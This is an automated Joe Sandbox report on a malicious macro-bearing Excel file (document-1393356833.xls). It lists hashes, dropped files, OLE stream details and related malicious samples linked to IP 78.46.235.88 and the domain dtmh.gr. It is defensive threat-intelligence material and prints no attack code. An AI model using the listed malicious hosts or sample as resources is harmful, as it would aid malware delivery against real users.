                                                                                                                                                      Analysis ID:324294
                                                                                                                                                      Start date:29.11.2020
                                                                                                                                                      Start time:04:00:42
                                                                                                                                                      Joe Sandbox Product:CloudBasic
                                                                                                                                                      Overall analysis duration:0h 4m 47s
                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                      Report type:light
                                                                                                                                                      Sample file name:document-1393356833.xls
                                                                                                                                                      Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                      Run name:Potential for more IOCs and behavior
                                                                                                                                                      Number of analysed new started processes analysed:26
                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                                      Technologies:
                                                                                                                                                      • HCA enabled
                                                                                                                                                      • EGA enabled
                                                                                                                                                      • HDC enabled
                                                                                                                                                      • AMSI enabled
                                                                                                                                                      Analysis Mode:default
                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                      Detection:MAL
                                                                                                                                                      Classification:mal80.expl.evad.winXLS@3/6@1/2
                                                                                                                                                      EGA Information:Failed
                                                                                                                                                      HDC Information:Failed
                                                                                                                                                      HCA Information:
                                                                                                                                                      • Successful, ratio: 100%
                                                                                                                                                      • Number of executed functions: 0
                                                                                                                                                      • Number of non-executed functions: 0
                                                                                                                                                      Cookbook Comments:
                                                                                                                                                      • Adjust boot time
                                                                                                                                                      • Enable AMSI
                                                                                                                                                      • Found application associated with file extension: .xls
                                                                                                                                                      • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                      • Attach to Office via COM
                                                                                                                                                      • Scroll down
                                                                                                                                                      • Close Viewer
                                                                                                                                                      Warnings:
                                                                                                                                                      Show All
                                                                                                                                                      • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe
                                                                                                                                                      • Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 93.184.220.29, 52.109.88.177, 52.109.76.35, 52.109.12.24, 104.42.151.234, 52.255.188.83, 51.104.139.180, 2.20.84.85, 20.54.26.129, 2.20.142.210, 2.20.142.209, 92.122.213.247, 92.122.213.194, 52.155.217.156
                                                                                                                                                      • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, cs9.wac.phicdn.net, prod-w.nexus.live.com.akadns.net, arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, ocsp.digicert.com, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, nexus.officeapps.live.com, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, fs.microsoft.com, dual-a-0001.a-msedge.net, prod.configsvc1.live.com.akadns.net, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, europe.configsvc1.live.com.akadns.net

                                                                                                                                                      Simulations

                                                                                                                                                      Behavior and APIs

                                                                                                                                                      No simulations

                                                                                                                                                      Joe Sandbox View / Context

                                                                                                                                                      IPs

                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                      78.46.235.88document-1411290183.xlsGet hashmaliciousBrowse
                                                                                                                                                        document-1393356833.xlsGet hashmaliciousBrowse
                                                                                                                                                          document-1449702565.xlsGet hashmaliciousBrowse
                                                                                                                                                            document-1457177111.xlsGet hashmaliciousBrowse
                                                                                                                                                              document-1449702565.xlsGet hashmaliciousBrowse
                                                                                                                                                                document-146786230.xlsGet hashmaliciousBrowse
                                                                                                                                                                  document-1457177111.xlsGet hashmaliciousBrowse
                                                                                                                                                                    document-146786230.xlsGet hashmaliciousBrowse
                                                                                                                                                                      document-1442977347.xlsGet hashmaliciousBrowse
                                                                                                                                                                        document-1442977347.xlsGet hashmaliciousBrowse
                                                                                                                                                                          document-1465459998.xlsGet hashmaliciousBrowse
                                                                                                                                                                            document-1444203221.xlsGet hashmaliciousBrowse
                                                                                                                                                                              document-1444203221.xlsGet hashmaliciousBrowse
                                                                                                                                                                                document-1466544307.xlsGet hashmaliciousBrowse
                                                                                                                                                                                  document-1466544307.xlsGet hashmaliciousBrowse
                                                                                                                                                                                    document-1456597551.xlsGet hashmaliciousBrowse
                                                                                                                                                                                      document-1456597551.xlsGet hashmaliciousBrowse
                                                                                                                                                                                        document-1460706074.xlsGet hashmaliciousBrowse
                                                                                                                                                                                          document-1460706074.xlsGet hashmaliciousBrowse
                                                                                                                                                                                            document-1475334804.xlsGet hashmaliciousBrowse

                                                                                                                                                                                              Domains

                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                              dtmh.grdocument-1411290183.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 78.46.235.88
                                                                                                                                                                                              document-1393356833.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 78.46.235.88
                                                                                                                                                                                              document-1449702565.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 78.46.235.88
                                                                                                                                                                                              document-1457177111.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 78.46.235.88
                                                                                                                                                                                              document-1449702565.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 78.46.235.88
                                                                                                                                                                                              document-146786230.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 78.46.235.88
                                                                                                                                                                                              document-1457177111.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 78.46.235.88
                                                                                                                                                                                              document-146786230.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 78.46.235.88
                                                                                                                                                                                              document-1442977347.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 78.46.235.88
                                                                                                                                                                                              document-1442977347.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 78.46.235.88
                                                                                                                                                                                              document-1465459998.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 78.46.235.88
                                                                                                                                                                                              document-1444203221.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 78.46.235.88
                                                                                                                                                                                              document-1444203221.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 78.46.235.88
                                                                                                                                                                                              document-1466544307.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 78.46.235.88
                                                                                                                                                                                              document-1466544307.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 78.46.235.88
                                                                                                                                                                                              document-1456597551.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 78.46.235.88
                                                                                                                                                                                              document-1456597551.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 78.46.235.88
                                                                                                                                                                                              document-1460706074.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 78.46.235.88
                                                                                                                                                                                              document-1460706074.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 78.46.235.88
                                                                                                                                                                                              document-1475334804.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 78.46.235.88

                                                                                                                                                                                              ASN

                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                              HETZNER-ASDEdocument-1411290183.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 78.46.235.88
                                                                                                                                                                                              document-1393356833.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 78.46.235.88
                                                                                                                                                                                              document-1449702565.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 78.46.235.88
                                                                                                                                                                                              document-1457177111.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 78.46.235.88
                                                                                                                                                                                              document-1449702565.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 78.46.235.88
                                                                                                                                                                                              document-146786230.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 78.46.235.88
                                                                                                                                                                                              document-1457177111.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 78.46.235.88
                                                                                                                                                                                              document-146786230.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 78.46.235.88
                                                                                                                                                                                              document-1442977347.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 78.46.235.88
                                                                                                                                                                                              document-1442977347.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 78.46.235.88
                                                                                                                                                                                              document-1465459998.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 78.46.235.88
                                                                                                                                                                                              document-1444203221.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 78.46.235.88
                                                                                                                                                                                              document-1444203221.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 78.46.235.88
                                                                                                                                                                                              document-1466544307.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 78.46.235.88
                                                                                                                                                                                              document-1466544307.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 78.46.235.88
                                                                                                                                                                                              https://ofd.beeline.ru/check-order/oxjsoinmqGet hashmaliciousBrowse
                                                                                                                                                                                              • 88.99.149.88
                                                                                                                                                                                              document-1456597551.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 78.46.235.88
                                                                                                                                                                                              document-1456597551.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 78.46.235.88
                                                                                                                                                                                              document-1460706074.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 78.46.235.88
                                                                                                                                                                                              document-1460706074.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 78.46.235.88

                                                                                                                                                                                              JA3 Fingerprints

                                                                                                                                                                                              No context

                                                                                                                                                                                              Dropped Files

                                                                                                                                                                                              No context

                                                                                                                                                                                              Created / dropped Files

                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\9FA1F744-8159-4D70-B39C-79B56408DE78
                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                              File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):129952
                                                                                                                                                                                              Entropy (8bit):5.378316776058371
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:1536:7cQceNWiA3gZwLpQ9DQW+zAUH34ZldpKWXboOilXPErLL8TT:pmQ9DQW+zBX8u
                                                                                                                                                                                              MD5:C707A4A66B95209FC52FEC506DB56991
                                                                                                                                                                                              SHA1:EA0415F1219D91FF2B06B376EFBD4A433C7EF8C6
                                                                                                                                                                                              SHA-256:1649544A224FA7272C83429D810EB1D7DE1A97057C78EBF6B61E6A0DA3622117
                                                                                                                                                                                              SHA-512:B4FE445A3F268D458240BF7E36DC41C1CD982A0F8A159395D63B46BF62F8078FF1015C63C6B69A121DFC332B209026BC90265CEE70279B812EFC58F110F02600
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2020-11-29T03:01:41">.. Build: 16.0.13518.30530-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\3AA10000
                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                              File Type:data
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):314884
                                                                                                                                                                                              Entropy (8bit):7.9855655553931975
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:6144:mB+mBrFLPodmRqyAVYtlKsVLCyo7NtbcY7uLaG/9t7+MK:nmBFPM8R3AsB+bjej/9cV
                                                                                                                                                                                              MD5:251F74FB109E447C29FDB74292A6A20E
                                                                                                                                                                                              SHA1:CEE381B78561093C1077A786CEBDBA55F458C624
                                                                                                                                                                                              SHA-256:A633E4025DED3D5678F620FA5411D7697A669892DBF777169C036DC97E4D1402
                                                                                                                                                                                              SHA-512:94140A6F66DF5F8D83E5CDF7BA64A8D3FA8337D87FBA51F198817E4D3322DC5E7ADF80BD0F86B23455DAD89C57F5FD776D70E92D07C3900195AAC53068180ED0
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Preview: .V.n.0....?......(..r.izl.$...\K....I..RV.4p,.6.^..vfv....jcM....w5..f..'........WV`.N....l....?.....h.5kS..8G..X...VV>Z..66<...........%p.L..-..a%.L*n6.x.d..+.w.e......".P...+..VZ.....t.!.P..$k..51.;H..C..r....6k...GD08Mf.CE.]*...7....>.q...Q+(nEL?.%....'..K...a.l...6.L.9VY!..qbi..v...0u.......n....t.#::.S.........;.;.........C......=....@....r.f..;...;..m.ik..\....s+"..Dm.9....#:T.OY../N............p.....> .....<O..]....4.3e_...i...1.@....O..........PK..........!.C.T.....e.......[Content_Types].xml ...(.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 16:19:49 2019, mtime=Sun Nov 29 11:01:45 2020, atime=Sun Nov 29 11:01:45 2020, length=12288, window=hide
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):904
                                                                                                                                                                                              Entropy (8bit):4.640645030565382
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:12:8jPocXUl8uElPCH2YgYoXr1YBh+Ru+WrjAZ/2bDqyLC5Lu4t2Y+xIBjKZm:8jAPgn3MAZiDqb87aB6m
                                                                                                                                                                                              MD5:230B3A9AC093E07F5CA7F906B47D0069
                                                                                                                                                                                              SHA1:73CC7E4D1800CDAF5AD1E702261983C07B25338C
                                                                                                                                                                                              SHA-256:ED08F92458949830247891AEBFA889B77A14CBDA12D4458275E2238109118CC4
                                                                                                                                                                                              SHA-512:D0EF43C570B3B26F5DA590F65F23E801AEEAF9E6CE22852485FA6DF8ABB474F46E993F71CB79E539736CA50819861C5B642105067E0494EE5ED1E97B421627AA
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Preview: L..................F........N....-.....hG...j..hG....0......................u....P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L..}Q*`....................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qxx..user.<.......Ny.}Q*`.....S....................1Q..h.a.r.d.z.....~.1.....}Q7`..Desktop.h.......Ny.}Q7`.....Y..............>......ZT.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......E...............-.......D...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...As...`.......X.......301389...........!a..%.H.VZAj...4.4...........-..!a..%.H.VZAj...4.4...........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\document-1393356833.xls.LNK
                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 14:03:45 2020, mtime=Sun Nov 29 11:01:45 2020, atime=Sun Nov 29 11:01:45 2020, length=339968, window=hide
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):4400
                                                                                                                                                                                              Entropy (8bit):4.664540957548368
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:96:87MqznFvK7MqznFvK7EqznFvK7EqznFv:87MqzI7MqzI7EqzI7Eqz
                                                                                                                                                                                              MD5:8FA61362848D45D40010188341E58318
                                                                                                                                                                                              SHA1:3BC5A546BE36AA3B343308DE86E1057E59379F60
                                                                                                                                                                                              SHA-256:BC9111E5E1DFC88057AA2DB0981D61092267F889D68D73E184EFCED8D823D05D
                                                                                                                                                                                              SHA-512:3F1E21118DCA747F5E814E38C26AC3065B50FC7E8C40AF052B358059A425770548B9E5457F3465C803B6F2EED0755436CB6643DDB98ED696499E23E5501CE321
                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Preview: L..................F.... .......:....F.hG....F.hG....0...........................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L..}Q*`....................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qxx..user.<.......Ny.}Q*`.....S....................1Q..h.a.r.d.z.....~.1.....>Qyx..Desktop.h.......Ny.}Q*`.....Y..............>.....+.r.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....|.2..0..}Q2` .DOCUME~1.XLS..`......>Qwx}Q2`....h.......................n.d.o.c.u.m.e.n.t.-.1.3.9.3.3.5.6.8.3.3...x.l.s.......]...............-.......\...........>.S......C:\Users\user\Desktop\document-1393356833.xls........\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.d.o.c.u.m.e.n.t.-.1.3.9.3.3.5.6.8.3.3...x.l.s.........:..,.LB.)...As...`.......X.......301389...........!a..%.H.VZAj......-.........-..!a..%.H.VZAj......-.........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                              Category:modified
                                                                                                                                                                                              Size (bytes):260
                                                                                                                                                                                              Entropy (8bit):4.685980354714533
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:6:dj6Y9LMbELMhY9LMbELMhY9LMbELMhY9LMl:dmjFhjFhjFhjl
                                                                                                                                                                                              MD5:12DBE158F250BB35A42DE1C5801AE8B0
                                                                                                                                                                                              SHA1:B2F0E0D5D02CF0FDF678D3608A1F112409D519AE
                                                                                                                                                                                              SHA-256:5040EE137C9612EC3400250C84EE3F42B62F648EA1ECCEB5AC3CC743A811C8F3
                                                                                                                                                                                              SHA-512:BA3887DB8C854CC4DA1E041D507A01D51A5AA05EFEB4C63F9920EA719CDA15AB63B69865CC01B7BB2B75B3FD477C0BED1FDE8A9A674142A2F60A1D2F5E11EEC9
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Preview: Desktop.LNK=0..[xls]..document-1393356833.xls.LNK=0..document-1393356833.xls.LNK=0..[xls]..document-1393356833.xls.LNK=0..document-1393356833.xls.LNK=0..[xls]..document-1393356833.xls.LNK=0..document-1393356833.xls.LNK=0..[xls]..document-1393356833.xls.LNK=0..
                                                                                                                                                                                              C:\Users\user\Desktop\FAA10000
                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                              File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):401455
                                                                                                                                                                                              Entropy (8bit):7.18061406656571
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:6144:DcKoSsxzNDZLDZjlbR868O8KiA4XkXOn2xEtjPOtioVjDGUU1qfDlavx+W+LIfdM:mizo8RnsIROnr6n75YCi
                                                                                                                                                                                              MD5:3ED52EC2DA6D16C98377D7673DEDB574
                                                                                                                                                                                              SHA1:0A1095F9D8718B9590471F2478725415AC005C8C
                                                                                                                                                                                              SHA-256:420085D63AA76CD271F3498C4E691625B9C57C1E3D4AF34845C4AFC5BC017F91
                                                                                                                                                                                              SHA-512:185FBB2C02A7D2283C03163512CC79292FF2BCD10745E775767CF580D4F7803E472D4981FBE93703C7B0FE34E3092CF89D6F0E866664603ABDA498CF48F8A0C0
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Preview: ........T8..........................\.p.... B.....a.........=..........................................................=.....i..9J.8.......X.@...........".......................1................S..C.a.l.i.b.r.i.1................S..C.a.l.i.b.r.i.1................S..C.a.l.i.b.r.i.1................S..C.a.l.i.b.r.i.1................S..C.a.l.i.b.r.i.1................S..C.a.l.i.b.r.i.1................S..C.a.l.i.b.r.i.1.......>........S..C.a.l.i.b.r.i.1.......?........S..C.a.l.i.b.r.i.1.......4........S..C.a.l.i.b.r.i.1................S..C.a.l.i.b.r.i.1...,...8........S..C.a.l.i.b.r.i.1.......8........S..C.a.l.i.b.r.i.1.......8........S..C.a.l.i.b.r.i.1................S..C.a.l.i.b.r.i.1................S..C.a.l.i.b.r.i.1...h...8........S..C.a.m.b.r.i.a.1.......<........S..C.a.l.i.b.r.i.1................S..C.a.l.i.b.r.i.1................S..C.a.l.i.b.r.i.1................S..C.a.l.i.b.r.i.1

                                                                                                                                                                                              Static File Info

                                                                                                                                                                                              General

                                                                                                                                                                                              File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Nov 26 09:47:56 2020, Security: 0
                                                                                                                                                                                              Entropy (8bit):7.519773831614413
                                                                                                                                                                                              TrID:
                                                                                                                                                                                              • Microsoft Excel sheet (30009/1) 78.94%
                                                                                                                                                                                              • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                                                                                                                                                                              File name:document-1393356833.xls
                                                                                                                                                                                              File size:339968
                                                                                                                                                                                              MD5:14868edc4a5e024fa9fa4099bfb9010e
                                                                                                                                                                                              SHA1:08c9a8b1663d6e02aa5265de51059ba6e17c5507
                                                                                                                                                                                              SHA256:448f1e86e4e8da6517e19da9f23577c5a84dd4f185049e74ab8c5becf571cd2f
                                                                                                                                                                                              SHA512:5f28b8ff29d387475df2eb13fdff7170cd6988b4513460b0168cb03320a8075a3bda0d2a9b9d6d368cd69610dcc4701cc4539511a04bd200f64fd2bd6896ba47
                                                                                                                                                                                              SSDEEP:6144:WcKoSsxzNDZLDZjlbR868O8Kfc03pXOFq7uDphYHceXVhca+fMHLty/x2zZ8kpTv:7izo8RnsIROnr6n75YL
                                                                                                                                                                                              File Content Preview:........................>......................................................................................................................................................................................................................................

                                                                                                                                                                                              File Icon

                                                                                                                                                                                              Icon Hash:74ecd4c6c3c6c4d8

                                                                                                                                                                                              Static OLE Info

                                                                                                                                                                                              General

                                                                                                                                                                                              Document Type:OLE
                                                                                                                                                                                              Number of OLE Files:1

                                                                                                                                                                                              OLE File "document-1393356833.xls"

                                                                                                                                                                                              Indicators

                                                                                                                                                                                              Has Summary Info:True
                                                                                                                                                                                              Application Name:Microsoft Excel
                                                                                                                                                                                              Encrypted Document:False
                                                                                                                                                                                              Contains Word Document Stream:False
                                                                                                                                                                                              Contains Workbook/Book Stream:True
                                                                                                                                                                                              Contains PowerPoint Document Stream:False
                                                                                                                                                                                              Contains Visio Document Stream:False
                                                                                                                                                                                              Contains ObjectPool Stream:
                                                                                                                                                                                              Flash Objects Count:
                                                                                                                                                                                              Contains VBA Macros:True

                                                                                                                                                                                              Summary

                                                                                                                                                                                              Code Page:1251
                                                                                                                                                                                              Author:
                                                                                                                                                                                              Last Saved By:
                                                                                                                                                                                              Create Time:2006-09-16 00:00:00
                                                                                                                                                                                              Last Saved Time:2020-11-26 09:47:56
                                                                                                                                                                                              Creating Application:Microsoft Excel
                                                                                                                                                                                              Security:0

                                                                                                                                                                                              Document Summary

                                                                                                                                                                                              Document Code Page:1251
                                                                                                                                                                                              Thumbnail Scaling Desired:False
                                                                                                                                                                                              Contains Dirty Links:False
                                                                                                                                                                                              Shared Document:False
                                                                                                                                                                                              Changed Hyperlinks:False
                                                                                                                                                                                              Application Version:917504

                                                                                                                                                                                              Streams

                                                                                                                                                                                              Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                                                                              General
                                                                                                                                                                                              Stream Path:\x5DocumentSummaryInformation
                                                                                                                                                                                              File Type:data
                                                                                                                                                                                              Stream Size:4096
                                                                                                                                                                                              Entropy:0.367004077607
                                                                                                                                                                                              Base64 Encoded:False
                                                                                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . . . . . 2 . . . . . . . . . 3 . . . . . . . . . 1 . . . . . . . . . 4 . . . . . . . . . 5 . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 00 01 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 bf 00 00 00 02 00 00 00 e3 04 00 00
                                                                                                                                                                                              Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                                                                              General
                                                                                                                                                                                              Stream Path:\x5SummaryInformation
                                                                                                                                                                                              File Type:data
                                                                                                                                                                                              Stream Size:4096
                                                                                                                                                                                              Entropy:0.246848689361
                                                                                                                                                                                              Base64 Encoded:False
                                                                                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . x 7 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00
                                                                                                                                                                                              Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 327615
                                                                                                                                                                                              General
                                                                                                                                                                                              Stream Path:Workbook
                                                                                                                                                                                              File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                                                              Stream Size:327615
                                                                                                                                                                                              Entropy:7.64856469562
                                                                                                                                                                                              Base64 Encoded:True
